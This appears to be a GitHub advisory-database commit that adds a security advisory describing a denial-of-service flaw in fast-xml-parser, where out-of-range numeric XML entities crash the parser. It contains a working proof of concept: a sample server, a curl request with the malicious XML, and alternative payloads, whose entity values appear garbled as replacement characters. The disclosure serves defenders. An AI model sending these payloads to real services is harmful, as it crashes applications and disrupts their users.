+ "details": "### Summary\nA RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `�` or `�`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.\n\n### Details\nThe vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45:\n\n```javascript\n\"num_dec\": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },\n\"num_hex\": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },\n```\n\nThe `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:\n- `[0-9]{1,7}` matches up to 9,999,999\n- `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215)\n\nThe entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch:\n\n```javascript\nval = val.replace(entity.regex, entity.val);\n```\n\nThis causes the RangeError to propagate uncaught, crashing the parser and any application using it.\n### PoC\n#### Setup\n\nCreate a directory with these files:\n\n```\npoc/\n├── package.json\n├── server.js\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"fast-xml-parser\": \"^5.3.3\" } }\n```\n\n**server.js**\n```javascript\nconst http = require('http');\nconst { XMLParser } = require('fast-xml-parser');\n\nconst parser = new XMLParser({ processEntities: true, htmlEntities: true });\n\nhttp.createServer((req, res) => {\n if (req.method === 'POST' && req.url === '/parse') {\n let body = '';\n req.on('data', c => body += c);\n req.on('end', () => {\n const result = parser.parse(body); // No try-catch - will crash!\n res.end(JSON.stringify(result));\n });\n } else {\n res.end('POST /parse with XML body');\n }\n}).listen(3000, () => console.log('http://localhost:3000'));\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Send malicious payload (server will crash)\ncurl -X POST -H \"Content-Type: application/xml\" -d '<?xml version=\"1.0\"?><root>�</root>' http://localhost:3000/parse\n``` \n#### Result\n\nServer crashes with:\n```\nRangeError: Invalid code point 9999999\n```\n\n#### Alternative Payloads\n\n```xml\n<!-- Hex variant -->\n<?xml version=\"1.0\"?><root>�</root>\n\n<!-- In attribute -->\n<?xml version=\"1.0\"?><root attr=\"�\"/>\n```\n\n### Impact\n*Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:\n\n- **API servers** accepting XML payloads\n- **File processors** parsing uploaded XML files\n- **Message queues** consuming XML messages\n- **RSS/Atom feed parsers**\n- **SOAP/XML-RPC services**\n\nA single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments